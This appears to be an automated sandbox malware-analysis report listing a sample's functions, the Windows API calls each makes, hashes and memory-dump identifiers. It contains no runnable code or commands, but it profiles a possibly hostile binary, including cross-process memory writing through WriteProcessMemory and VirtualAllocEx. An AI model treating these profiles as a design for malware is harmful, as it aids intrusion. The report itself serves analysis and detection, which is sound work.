                                                      • Part of subcall function 0039D2F7: _wcslen.LIBCMT ref: 0039D3C7
                                                      • Part of subcall function 0039D2F7: _wcslen.LIBCMT ref: 0039D3FD
                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0039C404
                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0039C45F
                                                    • RegEnumKeyExW.ADVAPI32 ref: 0039C4C2
                                                    • RegCloseKey.ADVAPI32(?,?), ref: 0039C505
                                                    • RegCloseKey.ADVAPI32(00000000), ref: 0039C512
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                    • String ID:
                                                    • API String ID: 826366716-0
                                                    • Opcode ID: daca07797155dde5f6951c35daf9f38455c7719b4353dbc92d8aafa9605eb251
                                                    • Instruction ID: 3b45cb23cf2f2cc788d23b0ee95a810c807d57157d86e4691c98bf97633b0a9f
                                                    • Opcode Fuzzy Hash: daca07797155dde5f6951c35daf9f38455c7719b4353dbc92d8aafa9605eb251
                                                    • Instruction Fuzzy Hash: F761C531218241AFD716DF14C490E6ABBE5FF88308F55959CF4998F2A2CB31ED45CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0037EC27 Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0037E60C: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0037D6E2,?), ref: 0037E629
                                                      • Part of subcall function 0037E60C: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0037D6E2,?), ref: 0037E642
                                                      • Part of subcall function 0037E9C5: GetFileAttributesW.KERNELBASE(?,0037D755), ref: 0037E9C6
                                                    • lstrcmpiW.KERNEL32(?,?), ref: 0037EC9F
                                                    • MoveFileW.KERNEL32(?,?), ref: 0037ECD8
                                                    • _wcslen.LIBCMT ref: 0037EE17
                                                    • _wcslen.LIBCMT ref: 0037EE2F
                                                    • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 0037EE7C
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                    • String ID:
                                                    • API String ID: 3183298772-0
                                                    • Opcode ID: 781fc2e015b1bf9ccf4c9baac56df84d8f43d020213f5de2ea15c993b4be63c3
                                                    • Instruction ID: 194087132e99d5621a5cdac7136d7e5a8f4c6ba44d0fc866f9226aaf33f4e839
                                                    • Opcode Fuzzy Hash: 781fc2e015b1bf9ccf4c9baac56df84d8f43d020213f5de2ea15c993b4be63c3
                                                    • Instruction Fuzzy Hash: 6A5164B24083859BC776EBA4D8819DBB3ECAF89310F00492EF589D7151EF74A6888756
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003423E1 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: _free
                                                    • String ID:
                                                    • API String ID: 269201875-0
                                                    • Opcode ID: 74417e2f9ae98bc59023df6d729447cfd81e2665fbb0ddf390426202c9ad0fdd
                                                    • Instruction ID: 19bd8b67d7b03f7f60e28db197e8a23cf29a0daf1ca3fa077c90ed69f20d2752
                                                    • Opcode Fuzzy Hash: 74417e2f9ae98bc59023df6d729447cfd81e2665fbb0ddf390426202c9ad0fdd
                                                    • Instruction Fuzzy Hash: C841DE36E002049FCB26DF68C880A5AB7E5EF89314F9645A9F915FF391DA31ED01CB80
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003841CE Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetInputState.USER32 ref: 00384225
                                                    • TranslateAcceleratorW.USER32(?,00000000,?), ref: 0038427C
                                                    • TranslateMessage.USER32(?), ref: 003842A5
                                                    • DispatchMessageW.USER32 ref: 003842AF
                                                    • PeekMessageW.USER32 ref: 003842C0
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                    • String ID:
                                                    • API String ID: 2256411358-0
                                                    • Opcode ID: e0e00b81c433afb44c2f50546467b64b1b2630f45500893d2f6f1d95d4be6a3a
                                                    • Instruction ID: 79d821f0182508fcd6434f07ab942366dfcdb273533171b524f51fd2b6bbef14
                                                    • Opcode Fuzzy Hash: e0e00b81c433afb44c2f50546467b64b1b2630f45500893d2f6f1d95d4be6a3a
                                                    • Instruction Fuzzy Hash: 5931C674908387DEEB37EB749848BB737ACAB15305F050AEDE462869E0E7A49484CB11
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00372191 Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetWindowRect.USER32 ref: 003721A5
                                                    • PostMessageW.USER32(00000001,00000201,00000001), ref: 00372251
                                                    • Sleep.KERNEL32(00000000,?,?,?), ref: 00372259
                                                    • PostMessageW.USER32(00000001,00000202,00000000), ref: 0037226A
                                                    • Sleep.KERNEL32(00000000,?,?,?,?), ref: 00372272
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: MessagePostSleep$RectWindow
                                                    • String ID:
                                                    • API String ID: 3382505437-0
                                                    • Opcode ID: 60ae8b6056517c382186812a46dc4f23c9f235a17a31081e90c506981209355f
                                                    • Instruction ID: 3163b05c6cd338950acd7b4a50b33ff1daa983e0c04a8cd072ec0d61080450f2
                                                    • Opcode Fuzzy Hash: 60ae8b6056517c382186812a46dc4f23c9f235a17a31081e90c506981209355f
                                                    • Instruction Fuzzy Hash: 7F31CF71900219EFDB11CFA8CD89ADE7BB5EB15314F108625FA26A72E1C374E940CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003A6065 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(?,00001053,000000FF,?), ref: 003A60A4
                                                    • SendMessageW.USER32(?,00001074,?,00000001), ref: 003A60FC
                                                    • _wcslen.LIBCMT ref: 003A610E
                                                    • _wcslen.LIBCMT ref: 003A6119
                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 003A6175
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$_wcslen
                                                    • String ID:
                                                    • API String ID: 763830540-0
                                                    • Opcode ID: 4d54d9941dbc9047568dc521d0a7ff89d2abfdc486efca3e7d4e2907a133da7c
                                                    • Instruction ID: d44cc5cea2a0130955fb7f4e66a00fd1124b5166d635fce09747b892ce543c23
                                                    • Opcode Fuzzy Hash: 4d54d9941dbc9047568dc521d0a7ff89d2abfdc486efca3e7d4e2907a133da7c
                                                    • Instruction Fuzzy Hash: 91218271900218ABDB229FA4CC85AEEBBBCFF56324F144216F925EA185D7709985CF50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0037089E Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,003707D1,80070057,?,?,?,00370BEE), ref: 003708BB
                                                    • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,003707D1,80070057,?,?), ref: 003708D6
                                                    • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,003707D1,80070057,?,?), ref: 003708E4
                                                    • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,003707D1,80070057,?), ref: 003708F4
                                                    • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,003707D1,80070057,?,?), ref: 00370900
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: From$Prog$FreeStringTasklstrcmpi
                                                    • String ID:
                                                    • API String ID: 3897988419-0
                                                    • Opcode ID: 167f1ea5a13ca4b5373811285c4158d81194f69376181c5ab99953b70faf50d2
                                                    • Instruction ID: c8f8be85b0cd5a197f6159527714d2d09d3164f5870948879ecdfdbbee0fed61
                                                    • Opcode Fuzzy Hash: 167f1ea5a13ca4b5373811285c4158d81194f69376181c5ab99953b70faf50d2
                                                    • Instruction Fuzzy Hash: 8F01A2B6600209FFDB264F64DC04B9A7AFDEF49751F118024FA0AD2221D778DD009BA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00380BCB Relevance: 7.5, APIs: 6, Instructions: 41COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CloseHandle.KERNEL32(?,?,?,?,00380A39,?,00383C56,?,00000001,00353ACE,?), ref: 00380BE0
                                                    • CloseHandle.KERNEL32(?,?,?,?,00380A39,?,00383C56,?,00000001,00353ACE,?), ref: 00380BED
                                                    • CloseHandle.KERNEL32(?,?,?,?,00380A39,?,00383C56,?,00000001,00353ACE,?), ref: 00380BFA
                                                    • CloseHandle.KERNEL32(?,?,?,?,00380A39,?,00383C56,?,00000001,00353ACE,?), ref: 00380C07
                                                    • CloseHandle.KERNEL32(?,?,?,?,00380A39,?,00383C56,?,00000001,00353ACE,?), ref: 00380C14
                                                    • CloseHandle.KERNEL32(?,?,?,?,00380A39,?,00383C56,?,00000001,00353ACE,?), ref: 00380C21
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    • Opcode ID: a3cb0327becc7f3fb3fbb5df63fa39f91840f2f1a9671e8d50c11792cd42025b
                                                    • Instruction ID: d88014b43d59cef9045c99a15b9559924132ec5fd7b33de44597170da1fe82ed
                                                    • Opcode Fuzzy Hash: a3cb0327becc7f3fb3fbb5df63fa39f91840f2f1a9671e8d50c11792cd42025b
                                                    • Instruction Fuzzy Hash: 6E01E271800B15DFCB36AF66D980802FBF9EF503053028A3ED09242931C770A848CF80
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003764D3 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                    • String ID:
                                                    • API String ID: 3741023627-0
                                                    • Opcode ID: 6dfe74df647dd23c500efa7575371ff10de4bb02a7f77ab86264834aabc2b1cd
                                                    • Instruction ID: a6e868e52f9f260b5b0ba30d70dc51163c880fad72e8c7d180afebf247fa7c1e
                                                    • Opcode Fuzzy Hash: 6dfe74df647dd23c500efa7575371ff10de4bb02a7f77ab86264834aabc2b1cd
                                                    • Instruction Fuzzy Hash: 6D01D630500704ABEB365B10DD5FB96777CBB12705F004559B187A18F1DBF8AA44CB50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00342630 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _free.LIBCMT ref: 0034264E
                                                      • Part of subcall function 00342D58: RtlFreeHeap.NTDLL(00000000,00000000,?,0034DB71,003E1DC4,00000000,003E1DC4,00000000,?,0034DB98,003E1DC4,00000007,003E1DC4,?,0034DF95,003E1DC4), ref: 00342D6E
                                                      • Part of subcall function 00342D58: GetLastError.KERNEL32(003E1DC4,?,0034DB71,003E1DC4,00000000,003E1DC4,00000000,?,0034DB98,003E1DC4,00000007,003E1DC4,?,0034DF95,003E1DC4,003E1DC4), ref: 00342D80
                                                    • _free.LIBCMT ref: 00342660
                                                    • _free.LIBCMT ref: 00342673
                                                    • _free.LIBCMT ref: 00342684
                                                    • _free.LIBCMT ref: 00342695
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 776569668-0
                                                    • Opcode ID: b63ff03b1f90b9c8004c72e263c08f2869ad147a1bda38f8dcc496b8f833232b
                                                    • Instruction ID: ac44ed465766fb5b122b924f6e6849da077df389cbdbdc5c4b315b1e86ae9c42
                                                    • Opcode Fuzzy Hash: b63ff03b1f90b9c8004c72e263c08f2869ad147a1bda38f8dcc496b8f833232b
                                                    • Instruction Fuzzy Hash: 93F036708411908F87A3AF54BC4184A37ACBB157617410B17F524BE2B4C7751983AFC5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00396B2D Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 324COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 003305D2: EnterCriticalSection.KERNEL32(003E170C,?,00000000,?,0031D1DA,003E3540,00000001,00000000,?,?,0038EF39,?,?,00000000,00000001,?), ref: 003305DD
                                                      • Part of subcall function 003305D2: LeaveCriticalSection.KERNEL32(003E170C,?,0031D1DA,003E3540,00000001,00000000,?,?,0038EF39,?,?,00000000,00000001,?,00000001,003E2430), ref: 0033061A
                                                      • Part of subcall function 00330433: __onexit.LIBCMT ref: 00330439
                                                    • __Init_thread_footer.LIBCMT ref: 00396B95
                                                      • Part of subcall function 00330588: EnterCriticalSection.KERNEL32(003E170C,00000000,?,0031D208,003E3540,003527E9,00000001,00000000,?,?,0038EF39,?,?,00000000,00000001,?), ref: 00330592
                                                      • Part of subcall function 00330588: LeaveCriticalSection.KERNEL32(003E170C,?,0031D208,003E3540,003527E9,00000001,00000000,?,?,0038EF39,?,?,00000000,00000001,?,00000001), ref: 003305C5
                                                      • Part of subcall function 00383EF6: LoadStringW.USER32(00000066,?,00000FFF,003ADCEC), ref: 00383F3E
                                                      • Part of subcall function 00383EF6: LoadStringW.USER32(?,?,00000FFF,?), ref: 00383F64
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: CriticalSection$EnterLeaveLoadString$Init_thread_footer__onexit
                                                    • String ID: x3>$x3>$x3>
                                                    • API String ID: 1072379062-883808319
                                                    • Opcode ID: 37b629296aaa409bd8920b1c217e1b264660e37210a9c5e78a76028e84a97b38
                                                    • Instruction ID: e29d1c54e73e85065ee1a84317884961624b58c956567873c3d942b7b988da13
                                                    • Opcode Fuzzy Hash: 37b629296aaa409bd8920b1c217e1b264660e37210a9c5e78a76028e84a97b38
                                                    • Instruction Fuzzy Hash: 5FC19C75A00109AFCF16DF98C992EBEB7B9EF48300F158069F915AB291DB70ED45CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0031CF30 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 232COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __Init_thread_footer.LIBCMT ref: 0031D203
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Init_thread_footer
                                                    • String ID: D5>$D5>$D5>
                                                    • API String ID: 1385522511-3648186090
                                                    • Opcode ID: 4fb5c490990abeef92edc972b530436d0ea48c4e39054db41ad07bb47cabc6e3
                                                    • Instruction ID: 9f635cbcec12bcbc5997ad3832b861876d7916b5ca1f7aec55c949b3ddfa3cd5
                                                    • Opcode Fuzzy Hash: 4fb5c490990abeef92edc972b530436d0ea48c4e39054db41ad07bb47cabc6e3
                                                    • Instruction Fuzzy Hash: 83913975A00216DFCB59CF59C4906AAB7F2FF5E310F25816AD9469B380D731EE82CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00372FA6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0037BCDF: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00372A60,?,?,00000034,00000800,?,00000034), ref: 0037BD09
                                                    • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00372FF0
                                                      • Part of subcall function 0037BCAA: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00372A8F,?,?,00000800,?,00001073,00000000,?,?), ref: 0037BCD4
                                                      • Part of subcall function 0037BC06: GetWindowThreadProcessId.USER32(?,?), ref: 0037BC31
                                                      • Part of subcall function 0037BC06: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00372A24,00000034,?,?,00001004,00000000,00000000), ref: 0037BC41
                                                      • Part of subcall function 0037BC06: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00372A24,00000034,?,?,00001004,00000000,00000000), ref: 0037BC57
                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0037305D
                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 003730AA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                    • String ID: @
                                                    • API String ID: 4150878124-2766056989
                                                    • Opcode ID: 4a665f45b7fad31ed820ad53411a9de0d194a4b0e1529594a597ff4b09f82d31
                                                    • Instruction ID: 63986a79d79bcecd83049b9566c75907d270f5d9bdf21af28ca6e8277315ad7a
                                                    • Opcode Fuzzy Hash: 4a665f45b7fad31ed820ad53411a9de0d194a4b0e1529594a597ff4b09f82d31
                                                    • Instruction Fuzzy Hash: 95415F7690021DAFDB22DFA4CC85BDEB7B8EB09300F008055F949B7180DA756E85DB50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0037CA3D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 0037CAC6
                                                    • DeleteMenu.USER32(?,00000007,00000000), ref: 0037CB0C
                                                    • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,003E2990,00DD9580), ref: 0037CB55
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Menu$Delete$InfoItem
                                                    • String ID: 0
                                                    • API String ID: 135850232-4108050209
                                                    • Opcode ID: 4170a36daf8b1b78ee02d66a6834994b5332175651eeb04b707353af189145b3
                                                    • Instruction ID: 8e837e0ef682cdafa76501037f9f179dbad04e54844d26aaf4501bf8aace84a8
                                                    • Opcode Fuzzy Hash: 4170a36daf8b1b78ee02d66a6834994b5332175651eeb04b707353af189145b3
                                                    • Instruction Fuzzy Hash: 5241C1306153019FD736DF24C886F5ABBE8EF85320F04861DF9A99B291D774E904CBA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003A4D75 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON
                                                    Download Yara Rule
                                                    APIs
